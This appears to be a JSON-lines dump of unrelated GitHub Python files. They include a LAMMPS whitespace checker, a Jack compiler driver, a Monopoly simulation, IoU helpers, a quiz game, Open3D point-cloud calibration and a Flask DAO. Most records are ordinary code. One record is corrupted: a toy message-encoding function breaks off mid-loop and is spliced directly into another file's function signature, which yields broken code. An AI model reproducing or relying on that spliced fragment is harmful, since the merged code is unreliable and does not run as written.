later')\n\nimport os\nimport glob\nimport re\nimport yaml\nimport argparse\nimport shutil\n\nDEFAULT_CONFIG = \"\"\"\nrecursive: true\ninclude:\n - cmake/**\n - doc\n - doc/src/**\n - fortran/**\n - python/**\n - src/**\n - lib/**\n - tools/coding_standard\n - tools/python\n - tools/lammps-gui\n - unittest/**\nexclude:\n - lib/colvars/Install.py\n - lib/gpu/geryon/file_to_cstr.sh\n - lib/hdnnp\n - lib/kim\n - lib/kokkos\n - lib/latte\n - lib/machdyn\n - lib/mdi\n - lib/mscg\n - lib/pace\n - lib/plumed\n - lib/quip\n - lib/scafacos\n - lib/voronoi\n - src/Make.sh\npatterns:\n - \"*.c\"\n - \"*.cmake\"\n - \"*.cpp\"\n - \"*.h\"\n - \"*.md\"\n - \"*.py\"\n - \"*.rst\"\n - \"*.sh\"\n - \"*.f90\"\n - \".gitignore\"\n - \"README\"\n - \"requirements.txt\"\n\"\"\"\n\ndef check_trailing_whitespace(f):\n pattern = re.compile(r'[^\\n]*\\s+\\n$')\n last_line = \"\\n\"\n lineno = 1\n errors = set()\n\n for line in f:\n if pattern.match(line):\n errors.add(lineno)\n last_line = line\n lineno += 1\n\n return errors, last_line\n\ndef check_tabs(f):\n pattern = re.compile(r'[^\\n]*\\t+[^n]*\\n$')\n lineno = 1\n errors = set()\n\n for line in f:\n if pattern.match(line):\n errors.add(lineno)\n lineno += 1\n return errors\n\ndef check_file(path):\n encoding = 'UTF-8'\n last_line = \"\\n\"\n whitespace_errors = set()\n tab_errors = set()\n try:\n with open(path, 'r') as f:\n whitespace_errors, last_line = check_trailing_whitespace(f)\n except UnicodeDecodeError:\n encoding = 'ISO-8859-1'\n try:\n with open(path, 'r', encoding=encoding) as f:\n whitespace_errors, last_line = check_trailing_whitespace(f)\n except Exception:\n encoding = 'unknown'\n\n try:\n with open(path, 'r') as f:\n tab_errors = check_tabs(f)\n except UnicodeDecodeError:\n encoding = 'ISO-8859-1'\n try:\n with open(path, 'r', encoding=encoding) as f:\n tab_errors = check_tabs(f)\n except Exception:\n encoding = 'unknown'\n\n return {\n 'tab_errors': tab_errors,\n 'whitespace_errors': whitespace_errors,\n 'encoding': encoding,\n 'eof_error': not last_line.endswith('\\n')\n }\n\ndef fix_file(path, check_result):\n newfile = path + \".modified\"\n tab_pat = re.compile(r'^([^\\t]*)(\\t+)(.*)$')\n with open(newfile, 'w', encoding='UTF-8') as out:\n with open(path, 'r', encoding=check_result['encoding']) as src:\n for line in src:\n match = tab_pat.match(line)\n if match:\n # compute number of blanks assuming 8 character tab setting\n num = 8*len(match.group(2))-len(match.group(1))%8\n line = match.group(1) + \" \"*num + match.group(3)\n print(line.rstrip(), file=out)\n shutil.copymode(path, newfile)\n shutil.move(newfile, path)\n\ndef check_folder(directory, config, fix=False, verbose=False):\n success = True\n files = []\n\n for base_path in config['include']:\n for pattern in config['patterns']:\n path = os.path.join(directory, base_path, pattern)\n files += glob.glob(path, recursive=config['recursive'])\n for exclude in config['exclude']:\n files = [f for f in files if not f.startswith(os.path.join(directory,exclude))]\n\n for f in files:\n path = os.path.normpath(f)\n\n if verbose:\n print(\"Checking file:\", path)\n\n result = check_file(path)\n\n has_resolvable_errors = False\n\n for lineno in result['whitespace_errors']:\n print(\"[Error] Trailing whitespace @ {}:{}\".format(path, lineno))\n has_resolvable_errors = True\n\n for lineno in result['tab_errors']:\n print(\"[Error] Tab @ {}:{}\".format(path, lineno))\n has_resolvable_errors = True\n\n if result['eof_error']:\n print(\"[Error] Missing newline at end of file @ {}\".format(path))\n has_resolvable_errors = True\n\n if result['encoding'] == 'unknown':\n print(\"[Error] Unknown text encoding @ {}\".format(path))\n has_resolvable_errors = False\n success = False\n elif result['encoding'] == 'ISO-8859-1':\n print(\"[Error] Found ISO-8859-1 encoding instead of UTF-8 @ {}\".format(path))\n has_resolvable_errors = True\n\n if has_resolvable_errors:\n if fix:\n print(\"Applying automatic fixes to file:\", path)\n fix_file(path, result)\n else:\n success = False\n\n return success\n\ndef main():\n parser = argparse.ArgumentParser(description='Utility for detecting and fixing whitespace issues in LAMMPS')\n parser.add_argument('-c', '--config', metavar='CONFIG_FILE', help='location of a optional configuration file')\n parser.add_argument('-f', '--fix', action='store_true', help='automatically fix common issues')\n parser.add_argument('-v', '--verbose', action='store_true', help='verbose output')\n parser.add_argument('DIRECTORY', help='directory that should be checked')\n args = parser.parse_args()\n lammpsdir = os.path.abspath(os.path.expanduser(args.DIRECTORY))\n\n if args.config:\n with open(args.config, 'r') as cfile:\n config = yaml.load(cfile, Loader=yaml.FullLoader)\n else:\n config = yaml.load(DEFAULT_CONFIG, Loader=yaml.FullLoader)\n\n if not check_folder(lammpsdir, config, args.fix, args.verbose):\n sys.exit(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lammps/lammps","sub_path":"tools/coding_standard/whitespace.py","file_name":"whitespace.py","file_ext":"py","file_size_in_byte":5999,"program_lang":"python","lang":"en","doc_type":"code","stars":1860,"dataset":"github-code","pt":"81"} +{"seq_id":"16758543473","text":"from JackTokenizer import JackTokenizer\nfrom CompilationEngine import CompilationEngine\nimport sys\nimport os\nimport glob\n\nclass JackCompiler():\n @classmethod\n def run(cls, input_file, output_file):\n tokenizer = JackTokenizer(input_file)\n compiler = CompilationEngine(tokenizer, output_file)\n compiler.compile_class()\n\n @classmethod\n def output_file_for(cls, input_file, ext_name='.vm'):\n file_name = os.path.basename(input_file).split(\".\")[0]\n dir_name = os.path.dirname(input_file).replace('./', '')\n # create subdirectory for compiled\n try:\n os.mkdir(\"./compiled/{}\".format(dir_name))\n except OSError:\n print(\"res directory already exists. continuing\")\n\n # for testing locally\n return \"./compiled/{}/{}{}\".format(dir_name, file_name, ext_name)\n # actual format expected for Coursera grader\n # return dir_name + \"/\" + file_name + ext_name\n\nif __name__ == \"__main__\" and len(sys.argv) == 2:\n arg = sys.argv[1]\n\n # determine output file names\n if os.path.isfile(arg):\n files = [arg]\n elif os.path.isdir(arg):\n jack_path = os.path.join(arg, \"*.jack\")\n files = glob.glob(jack_path)\n\n # create output directory - MAY NEED TO REMOVE\n try:\n os.mkdir(\"./compiled\")\n except OSError:\n print(\"output directory already exists. continuing\")\n\n for input_file_name in files:\n output_file_name = JackCompiler.output_file_for(input_file_name)\n output_file = open(output_file_name, 'w')\n input_file = open(input_file_name, 'r')\n JackCompiler.run(input_file, output_file)\n","repo_name":"EDalSanto/Nand2Tetris","sub_path":"projects/11/source/JackCompiler.py","file_name":"JackCompiler.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"81"} +{"seq_id":"25979037642","text":"#モノポリーで各マスに止まる確率をシミュレーションで計算する\nimport random\nimport time\nnumber_of_players = 3 #プレーヤーの数\nPlayers = [0]*number_of_players #プレーヤー位置の変数\nProbability = [0]*40 #確率計算用\ngame_length = 20 #ダイスを振る回数\n\n#ダイスによるゲーム進行\ndef dice():\n number = 0\n number += random.randint(1,6)\n time.sleep(0.01)\n number += random.randint(1,6)\n return number\n\n#チャンス判定\ndef isChance(location):\n if location == 7 or location == 22 or location == 36:\n return True\n\n#チャンス処理\ndef doChance(location):\n card = 0\n card = random.randint(1,16)\n if card == 1: #ボードウォークに進む\n return 39\n elif card == 2: #GOに進む\n return 0\n elif card == 3: #刑務所にいく\n return 10\n elif card == 4: #リーディング鉄道に進む\n return 5\n elif card == 5: #イリノイ通りに進む\n return 24\n elif card == 6: #セントチャールズプレースに進む\n return 11\n elif card == 7: #次の水道会社か電力会社に進む\n if location == 22:\n return 28\n else:\n return 12\n elif card == 8 or card == 9: #次の鉄道まで進む\n if location == 7:\n return 15\n elif location == 22:\n return 25\n elif location == 36:\n return 5\n else:\n return location\n\nprint(\"ゲーム開始\")\nincrease_counter = 0\nfor i in range(game_length):\n for j in range(number_of_players):\n Dice = dice()\n #print(Dice)\n Players[j] += Dice\n if Players[j] > 39:\n Players[j] -= 40\n Probability[Players[j]] += 1\n if Players[j] == 30:\n Players[j] = 1\n Probability[Players[j]] += 1\n increase_counter += 1\n if isChance(Players[j]):\n Players[j] = doChance(Players[j])\n if not(Players[j] == 7 or Players[j] == 22 or Players[j] == 36):\n Probability[Players[j]] += 1\n increase_counter += 1\n\nprint(\"結果発表\")\na = 0\nfor i in Probability:\n i = i/(game_length*number_of_players + increase_counter)*100\n print(str(a)+\"番のマス:\"+str(i)+\"%\")\n a += 1\n","repo_name":"isol178/pythonPractice","sub_path":"monopoly.py","file_name":"monopoly.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18615361700","text":"import os\nimport numpy as np\n\n\ndef center_iou(box1, box2):\n x1, y1, w1, h1 = box1\n x2, y2, w2, h2 = box2\n\n #计算每个框的上下左右边线的坐标\n y1_max = y1 + h1/2\n x1_max = x1 + w1/2\n y1_min = y1 - h1/2\n x1_min = x1 - w1/2\n\n y2_max = y2 + h2/2\n x2_max = x2 + w2/2\n y2_min = y2 - h2/2\n x2_min = x2 - w2/2\n\n #上取小下取大,右取小左取大\n xx1 = np.max([x1_min, x2_min])\n yy1 = np.max([y1_min, y2_min])\n xx2 = np.min([x1_max, x2_max])\n yy2 = np.min([y1_max, y2_max])\n\n #计算各个框的面积\n area1 = (x1_max-x1_min) * (y1_max-y1_min) \n area2 = (x2_max-x2_min) * (y2_max-y2_min)\n\n #计算相交的面积\n inter_area = (np.max([0, xx2-xx1])) * (np.max([0, yy2-yy1]))\n #计算IoU\n iou = inter_area / (area1+area2-inter_area)\n return iou\n\n\ndef lightjudge_IOU(fread, light_label, light_box, iou_thres):\n fread.seek(0)\n while True: #读取文件内容\n line = fread.readline() #按行读取内容\n if len(line) > 0: #当该行为空,表明已经读取到文件末尾,退出循环\n detect_content = line.split()#将它们分开\n detect_label = int(detect_content[0])\n detect_box = list(map(float, detect_content[1:]))\n if center_iou(light_box, detect_box) > iou_thres:\n if light_label == detect_label:\n return True\n else:\n break\n return False\n\n\ndef judge_IOU(pic_info, path):\n fread = open(path, 'r')\n for light_info in pic_info:\n if lightjudge_IOU(fread, light_info[0], light_info[1:], 0.5) == 0:\n fread.close()\n return False\n fread.close()\n return True\n\ndef judge_seq(pic_info, path):\n detect = []\n fread = open(path, 'r')\n while True:\n line = fread.readline()\n if len(line) > 0:\n detect.append([float(i) for i in line.split()])\n else:\n break\n \n detect.sort(key=lambda ele: ele[1])\n pic_info.sort(key=lambda ele: ele[1])\n\n detect_label = ''\n pic_label = ''\n for label in detect:\n detect_label = detect_label + str(int(label[0]))\n for label in pic_info:\n pic_label = pic_label + str(int(label[0]))\n \n if detect_label.find(pic_label) == -1:\n return False\n else:\n return True\n\n\nfpath = r\"E:\\code\\Server_Room_Judge\\2023_02_17\\labels\\2023_02_17_18_18_07.txt\" #检测结果文件的路径\npic_info = [[0, 0.51, 0.52, 0.03, 0.04],\n [1, 0.45, 0.51, 0.03, 0.04],\n [3, 0.39, 0.51, 0.03, 0.04]]\nif judge_seq(pic_info, fpath):\n print('True')\nelse:\n print('False')\n","repo_name":"byzhang17/Yolov5_detect","sub_path":"yolov5-v8.0/Judge.py","file_name":"Judge.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36672433152","text":"from random import randint\n\ndef CodingMessage2(Message, key):\n Lst=[]\n i=0\n newStr=\"\"\n #Splitting Message in List and encoding\n Lst.append(str(key)+\"{\")\n while(i dict:\n \"\"\"\n Загружает вопросы из файла формата json и возвращает словарь\n \"\"\"\n with open(filename, 'r', encoding='utf-8') as f_in:\n return json.load(f_in)\n\n\ndef show_field(game_field: dict) -> None:\n \"\"\"\n Вывод на экран игрового поля\n \"\"\"\n topics = []\n for topic in game_field.keys():\n topics.append(topic)\n\n max_topic_length = len(max(topics))\n placeholder = ' ' * 3\n\n for topic, topic_questions in game_field.items():\n print(topic.ljust(max_topic_length), end=' ')\n for score, question in topic_questions.items():\n print(score if not question['asked'] else placeholder, end=placeholder)\n print()\n\n\ndef parse_input(string: str, game_field: dict) -> bool | list[str]:\n \"\"\"\n Проверка введённых пользователем данных на соответствие формату и наличие вопроса такой категории и стоимости на\n игровом поле\n \"\"\"\n data = string.lower().capitalize().strip().split()\n # проверяем, что введено 2 значения\n if len(data) != 2:\n return False\n # проверяем, что введённая категория есть в перечне категорий\n if data[0] not in game_field.keys():\n return False\n # проверяем, что введённая стоимость вопроса существует\n if data[1] not in game_field[data[0]].keys():\n return False\n # проверяем, что такой вопрос ещё не задавали\n if game_field[data[0]][data[1]]['asked']:\n return False\n return data\n\n\ndef show_question(game_field: dict, q: list, statistics: dict) -> None:\n \"\"\"\n Показывает вопрос по заданной категории и стоимости, проверяет правильность введённого ответа и подсчитывает\n статистику\n \"\"\"\n cur_question = game_field[q[0]][q[1]]\n user_answer = input(f'Слово {cur_question[\"question\"]} в переводе означает ...\\n').lower()\n cur_question['asked'] = True\n if user_answer == cur_question['answer']:\n statistics['points'] += int(q[1])\n statistics['correct'] += 1\n print(f\"Верно, +{q[1]} очков. Ваш счет: {statistics['points']}\\n\")\n else:\n statistics['points'] -= int(q[1])\n statistics['incorrect'] += 1\n print(f\"Неверно, на самом деле: {cur_question['answer'].capitalize()}. -{q[1]} очков. \"\n f\"Ваш счет: {statistics['points']}\\n\")\n\n\ndef show_stats(statistics: dict) -> None:\n \"\"\"\n Показывает результаты после окончания игры\n \"\"\"\n print('У нас закончились вопросы!\\n')\n print(f'Ваш счет: {statistics[\"points\"]}')\n print(f'Верных ответов: {statistics[\"correct\"]}')\n print(f'Неверных ответов: {statistics[\"incorrect\"]}')\n\n\ndef save_results_to_file(statistics: dict, filename: str = 'data/results.json') -> None:\n \"\"\"\n Сохраняет результат игры в файл с общим списком результатов в формате json\n \"\"\"\n with open(filename, 'r', encoding='utf-8') as f_in:\n if os.stat(filename).st_size == 0: # если файл пуст\n total_stat = [statistics]\n else:\n total_stat = json.load(f_in)\n total_stat.append(statistics)\n\n with open(filename, 'w', encoding='utf-8') as f_out:\n json.dump(total_stat, f_out, indent=2)\n\n\nif __name__ == '__main__':\n cur_stat = {\n 'points': 0,\n 'correct': 0,\n 'incorrect': 0\n }\n\n questions = load_questions()\n\n number_of_questions = 0\n for val in questions.values():\n number_of_questions += len(val.keys())\n\n for _ in range(number_of_questions):\n show_field(questions)\n while True:\n user_input = input('\\nВведите вопрос и стоимость: ')\n parsing_res = parse_input(user_input, questions)\n if parsing_res:\n break\n print('Такого вопроса нет, попробуйте еще раз!')\n show_question(questions, parsing_res, cur_stat)\n\n show_stats(cur_stat)\n save_results_to_file(cur_stat)\n","repo_name":"alexs2011/Tasks_Python","sub_path":"SkyPro/Урок 7. Вложенные структуры. Домашнее задание/task_01.py","file_name":"task_01.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41695265794","text":"#!/usr/bin/python3\n\"\"\"\nGiven an integer array, find three numbers whose product is maximum and output\nthe maximum product.\n\nExample 1:\n\nInput: [1,2,3]\nOutput: 6\n\n\nExample 2:\n\nInput: [1,2,3,4]\nOutput: 24\n\n\nNote:\n\nThe length of the given array will be in range [3,104] and all elements are in\nthe range [-1000, 1000].\nMultiplication of any three numbers in the input won't exceed the range of\n32-bit signed integer.\n\"\"\"\nimport heapq\n\nfrom typing import List\n\n\nclass Solution:\n def maximumProduct(self, nums: List[int]) -> int:\n \"\"\"\n heapq nlargest nsmallest\n \"\"\"\n mxes = heapq.nlargest(3, nums)\n mns = heapq.nsmallest(3, nums)\n return max(\n mxes[0] * mxes[1] * mxes[2],\n mns[0] * mns[1] * mxes[0],\n )\n","repo_name":"algorhythms/LeetCode","sub_path":"628 Maximum Product of Three Numbers.py","file_name":"628 Maximum Product of Three Numbers.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":843,"dataset":"github-code","pt":"81"} +{"seq_id":"9570844553","text":"import numpy as np\nimport open3d as o3d\nimport time\nimport copy\nfrom itertools import permutations\n\n\ndef draw_registration_result(source, target, transformation):\n source_temp = copy.deepcopy(source)\n target_temp = copy.deepcopy(target)\n source_temp.paint_uniform_color([1, 0.706, 0])\n target_temp.paint_uniform_color([0, 0.651, 0.929])\n source_temp.transform(transformation)\n o3d.visualization.draw_geometries([source_temp, target_temp],\n zoom=0.4559,\n front=[0.6452, -0.3036, -0.7011],\n lookat=[1.9892, 2.0208, 1.8945],\n up=[-0.2779, -0.9482, 0.1556])\n\ndef preprocess_point_cloud(pcd, voxel_size):\n print(\":: Downsample with a voxel size %.3f.\" % voxel_size)\n pcd_down = pcd.voxel_down_sample(voxel_size)\n\n radius_normal = voxel_size * 2\n print(\":: Estimate normal with search radius %.3f.\" % radius_normal)\n pcd_down.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=30))\n\n radius_feature = voxel_size * 5\n print(\":: Compute FPFH feature with search radius %.3f.\" % radius_feature)\n pcd_fpfh = o3d.pipelines.registration.compute_fpfh_feature(\n pcd_down,\n o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=100))\n return pcd_down, pcd_fpfh\n\ndef execute_fast_global_registration(source_down, target_down, source_fpfh,\n target_fpfh, voxel_size):\n distance_threshold = voxel_size * 0.5\n print(\":: Apply fast global registration with distance threshold %.3f\" \\\n % distance_threshold)\n result = o3d.pipelines.registration.registration_fast_based_on_feature_matching(\n source_down, target_down, source_fpfh, target_fpfh,\n o3d.pipelines.registration.FastGlobalRegistrationOption(\n maximum_correspondence_distance=distance_threshold))\n return result\n\ndef execute_global_registration(source_down, target_down, source_fpfh,\n target_fpfh, voxel_size):\n distance_threshold = voxel_size * 1.5\n print(\":: RANSAC registration on downsampled point clouds.\")\n print(\" Since the downsampling voxel size is %.3f,\" % voxel_size)\n print(\" we use a liberal distance threshold %.3f.\" % distance_threshold)\n result = o3d.pipelines.registration.registration_ransac_based_on_feature_matching(\n source_down, target_down, source_fpfh, target_fpfh, True,\n distance_threshold,\n o3d.pipelines.registration.TransformationEstimationPointToPoint(False),\n 3, [\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnEdgeLength(\n 0.9),\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnDistance(\n distance_threshold)\n ], o3d.pipelines.registration.RANSACConvergenceCriteria(10000, 0.9999))\n print('The fitness is {} \\n\\n'.format(result.fitness))\n return result\n\ndef color_registration(source, target, iter, radius):\n\n current_transformation = np.identity(4)\n print(\"3-1. Downsample with a voxel size %.2f\" % radius)\n source_down = source.voxel_down_sample(radius)\n target_down = target.voxel_down_sample(radius)\n\n print(\"3-2. Estimate normal.\")\n source_down.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=radius * 2, max_nn=30))\n target_down.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=radius * 2, max_nn=30))\n\n print(\"3-3. Applying colored point cloud registration\")\n result_icp = o3d.pipelines.registration.registration_colored_icp(\n source_down, target_down, radius, current_transformation,\n o3d.pipelines.registration.TransformationEstimationForColoredICP(),\n o3d.pipelines.registration.ICPConvergenceCriteria(relative_fitness=1e-6,\n relative_rmse=1e-6,\n max_iteration=iter))\n current_transformation = result_icp.transformation\n print(result_icp)\n return result_icp\n\ndef display_inlier_outlier(cloud, ind):\n inlier_cloud = cloud.select_by_index(ind)\n outlier_cloud = cloud.select_by_index(ind, invert=True)\n\n print(\"Showing outliers (red) and inliers (gray): \")\n outlier_cloud.paint_uniform_color([1, 0, 0])\n inlier_cloud.paint_uniform_color([0.8, 0.8, 0.8])\n o3d.visualization.draw_geometries([inlier_cloud, outlier_cloud],\n zoom=0.3412,\n front=[0.4257, -0.2125, -0.8795],\n lookat=[2.6172, 2.0475, 1.532],\n up=[-0.0694, -0.9768, 0.2024])\n\ndef pick_points(pcd):\n print(\"\")\n print(\n \"1) Please pick at least three correspondences using [shift + left click]\"\n )\n print(\" Press [shift + right click] to undo point picking\")\n print(\"2) After picking points, press 'Q' to close the window\")\n vis = o3d.visualization.VisualizerWithEditing()\n vis.create_window()\n vis.add_geometry(pcd)\n vis.run() # user picks points\n vis.destroy_window()\n print(\"\")\n return vis.get_picked_points()\n\ndef interactive_registration(source, target, picked_id_source, picked_id_target, \n transformation_name=None):\n assert (len(picked_id_source) >= 3 and len(picked_id_target) >= 3)\n assert (len(picked_id_source) == len(picked_id_target))\n corr = np.zeros((len(picked_id_source), 2))\n corr[:, 0] = picked_id_source\n corr[:, 1] = picked_id_target\n\n # estimate rough transformation using correspondences\n print(\"Compute a rough transform using the correspondences given by user\")\n p2p = o3d.pipelines.registration.TransformationEstimationPointToPoint()\n trans_init = p2p.compute_transformation(source, target,\n o3d.utility.Vector2iVector(corr))\n\n # point-to-point ICP for refinement\n print(\"Perform point-to-point ICP refinement\")\n threshold = 0.03 # 3cm distance threshold\n reg_p2p = o3d.pipelines.registration.registration_icp(\n source, target, threshold, trans_init,\n o3d.pipelines.registration.TransformationEstimationPointToPoint())\n draw_registration_result(source, target, reg_p2p.transformation)\n print(\"registration result:\", reg_p2p.transformation)\n if transformation_name is not None:\n np.save(transformation_name, reg_p2p.transformation)\n return reg_p2p\n\ndef load_pc_dict(pcd_dir, keys_list, form='npy'):\n pcd_dict = { k:o3d.geometry.PointCloud() for k in keys_list }\n for key in keys_list:\n if form == 'npy':\n pcd_fn = pcd_dir+'/'+key+'.npy'\n print('\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n')\n print(pcd_fn)\n pcd_ary = np.load(pcd_fn)\n print(\"pcd ary shape:\", pcd_ary.shape)\n pcd_dict[key].points = o3d.utility.Vector3dVector(pcd_ary[:, :3])\n pcd_dict[key].colors = o3d.utility.Vector3dVector(pcd_ary[:, 3:])\n \n points = np.asarray(pcd_dict[key].points)\n if(key == 'torso'):\n pcd_dict[key] = pcd_dict[key].select_by_index(np.where(points[:,2] < 3.0)[0])\n else:\n pcd_dict[key] = pcd_dict[key].select_by_index(np.where(np.logical_and(points[:,2] < 3.0,points[:,2] > 1.5))[0])\n\n print(np.max(points,axis = 0))\n \n elif form == 'ply':\n pcd_fn = pcd_dir+'/'+key+'.ply'\n pcd_dict[key] = o3d.io.read_point_cloud(pcd_fn)\n return pcd_dict\n\nif __name__ == '__main__':\n\n pcd_dir = 'Calibration/data/point_cloud'\n # keys_list = ['realsense_left','realsense_right','realsense_torso']\n # pcd_dict = load_pc_dict(pcd_dir, keys_list)\n keys_list = ['left','right','torso']\n pcd_dict = load_pc_dict(pcd_dir, keys_list, 'ply')\n \n o3d.visualization.draw_geometries([pcd for k, pcd in pcd_dict.items()])\n\n # preprocess point cloud\n voxel_size = 0.01\n downsampled_results = {}\n for key in keys_list:\n res = preprocess_point_cloud(pcd_dict[key], voxel_size)\n downsampled_results.update({key:res})\n\n # transformations = {}\n # for key_comb in permutations(keys_list,2):\n # key1,key2 = key_comb\n # print(\"find transformtion:\", key_comb)\n # source_down,source_fpfh = downsampled_results[key1]\n # target_down,target_fpfh = downsampled_results[key2]\n # o3d.visualization.draw_geometries([source_down,target_down])\n\n # result = execute_global_registration(source_down, target_down, \n # source_fpfh, target_fpfh, voxel_size)\n # transformations.update({key_comb:result.transformation})\n # result = color_registration(source_down,target_down,iter = 1000,radius = voxel_size)\n # transformations.update({key_comb:result})\n \n # remove outliers from the original point cloud is time-consuming\n for k, pcd in pcd_dict.items():\n cl, ind = pcd.remove_statistical_outlier(nb_neighbors=20,\n std_ratio=2.0)\n display_inlier_outlier(pcd, ind)\n pcd_dict[k] = pcd.select_by_index(ind)\n\n # manual registration\n # voxel_size = 0.03\n # for k, pcd in pcd_dict.items():\n # pcd = pcd.voxel_down_sample(voxel_size)\n # cl, ind = pcd.remove_statistical_outlier(nb_neighbors=20,\n # std_ratio=2.0)\n # display_inlier_outlier(pcd, ind)\n # pcd_dict[k] = pcd.select_by_index(ind)\n \n trans_dir = 'Calibration/data/extrinsics'\n\n # manual registration\n picked_left = pick_points(pcd_dict['left'])\n picked_right = pick_points(pcd_dict['right'])\n interactive_registration(pcd_dict['left'], \n pcd_dict['right'], \n picked_left, picked_right, \n trans_dir+'/left2right.npy')\n\n # picked_left = pick_points(pcd_dict['left'])\n # picked_torso = pick_points(pcd_dict['torso'])\n # interactive_registration(pcd_dict['left'], \n # pcd_dict['torso'], \n # picked_left, picked_torso,\n # trans_dir+'/left2torso.npy')\n\n picked_right = pick_points(pcd_dict['right'])\n picked_torso = pick_points(pcd_dict['torso'])\n interactive_registration(pcd_dict['right'], \n pcd_dict['torso'], \n picked_right, picked_torso,\n trans_dir+'/right2torso.npy')\n\n # verify transformation\n # left2torso_E = transformations[(('left','torso'))]\n left2torso_E = np.load(trans_dir+'/left2torso.npy')\n # right2torso_E = transformations[(('right','torso'))]\n right2torso_E = np.load(trans_dir+'/right2torso.npy')\n pcd_dict['left'].transform(left2torso_E)\n pcd_dict['right'].transform(right2torso_E)\n o3d.visualization.draw_geometries([pcd for k, pcd in pcd_dict.items()])\n\n\n # global registration\n # start = time.time()\n # result_fast = execute_global_registration(pcd_left, pcd_right,\n # pcd_left_fpfh, pcd_right_fpfh,\n # voxel_size)\n # print(\"Global registration took %.3f sec.\\n\" % (time.time() - start))\n # print(result_fast)\n # draw_registration_result(pcd_left, pcd_right, result_fast.transformation)\n \n # color icp\n # pcd_left = pcd_dict['realsense_left']\n # pcd_right = pcd_dict['realsense_right']\n\n # results = color_registration(pcd_left, pcd_right, 50, 0.04)\n # draw_registration_result(pcd_left, pcd_right, results.transformation)","repo_name":"ShaoxiongYao/ECE598HRI-FinalProject","sub_path":"open3d_calibration.py","file_name":"open3d_calibration.py","file_ext":"py","file_size_in_byte":11825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73070708106","text":"sum = int(input('Введите сумму'))\n\ntext = str\n\nif sum > 4 and sum < 21:\n text = 'копеек'\n\nelif sum == 0:\n text = 'у вас нет денег =('\n\nelse:\n sum > 21\n dot = sum / 10\n res = round(dot - int(dot), 1) * 10\n\n if res == 1:\n text = 'копейка'\n elif res > 1 and res < 5:\n text = 'копейки'\n elif res > 4 and res <= 9 or res == 0:\n text = 'копеек'\n\nprint(sum, text)","repo_name":"DanaMartynovska/ITEA-python-basics-homework","sub_path":"Home work 1 coins.py","file_name":"Home work 1 coins.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37584302976","text":"from project import db\nfrom project.com.vo.CropTypeVO import CropTypeVO\nfrom project.com.vo.CropVO import CropVO\nfrom project.com.vo.ImageVO import ImageVO\nfrom project.com.vo.LoginVO import LoginVO\n\n\nclass ImageDAO:\n def insertImage(self, ImageVO):\n db.session.add(ImageVO)\n db.session.commit()\n\n def viewImage(self, imageVO):\n imageList = db.session.query(ImageVO, CropVO, CropTypeVO, LoginVO) \\\n .join(CropVO, ImageVO.image_CropId == CropVO.cropId) \\\n .join(CropTypeVO, ImageVO.image_CropTypeId == CropTypeVO.cropTypeId) \\\n .join(LoginVO, ImageVO.imageFrom_LoginId == LoginVO.loginId) \\\n .filter(ImageVO.imageFrom_LoginId == imageVO.imageFrom_LoginId).all()\n return imageList\n\n def deleteImage(self, imageVO):\n imageList = ImageVO.query.get(imageVO.imageID)\n db.session.delete(imageList)\n db.session.commit()\n return imageList\n\n def adminViewImage(self):\n imageList = db.session.query(ImageVO, CropVO, CropTypeVO, LoginVO) \\\n .join(CropVO, ImageVO.image_CropId == CropVO.cropId) \\\n .join(CropTypeVO, ImageVO.image_CropTypeId == CropTypeVO.cropTypeId) \\\n .join(LoginVO, ImageVO.imageFrom_LoginId == LoginVO.loginId).all()\n return imageList\n","repo_name":"soham2512/Agripedia","sub_path":"project/com/dao/ImageDAO.py","file_name":"ImageDAO.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16006758408","text":"from argparse import ArgumentParser\n\n\ndef argparse_setup() -> ArgumentParser.parse_args:\n \"\"\"Setup and return argparse.\"\"\"\n parser = ArgumentParser()\n\n parser.add_argument(\n '-c',\n '--channel',\n dest='channel',\n help='the channel with the user want to see programs from',\n nargs=\"*\",\n action=\"extend\",\n type=str\n )\n\n parser.add_argument(\n '-t',\n '--time',\n dest='time',\n metavar='hh:mm',\n help='the time the program starts. E.g. \"20:00\". Format is: \"hh:mm\"',\n nargs=\"*\",\n action=\"extend\",\n type=str\n )\n\n parser.add_argument(\n '-a',\n '--all',\n help='show all programs for the chosen channel(s)',\n action='store_true'\n )\n\n parser.add_argument(\n '-d',\n '--day',\n help='the relative day the programs is running, default today (0)',\n choices=[-1, 0, 1, 2, 3, 4, 5, 6],\n type=int,\n default=0\n )\n\n parser.add_argument(\n '--category',\n dest='category',\n help='only show the programs with the chosen category(s)',\n nargs=\"*\",\n action=\"extend\",\n type=str\n )\n\n parser.add_argument(\n '-n',\n '--now',\n help='only show the program(s) that is currently',\n action='store_true'\n )\n\n parser.add_argument(\n '-v',\n '--verbose',\n help='show categories when using --all and --time',\n action='store_true'\n )\n\n parser.add_argument(\n '--default-channels',\n dest='default_channels',\n help='change default channels to the chosen channel(s)',\n nargs='*'\n )\n\n parser.add_argument(\n '--default-space-seperator',\n dest='default_space_seperator',\n help='change space seperator sign',\n type=str\n )\n\n parser.add_argument(\n '--justify-length',\n dest='justify_length',\n help='change justify length',\n type=str\n )\n\n parser.add_argument(\n '-s',\n 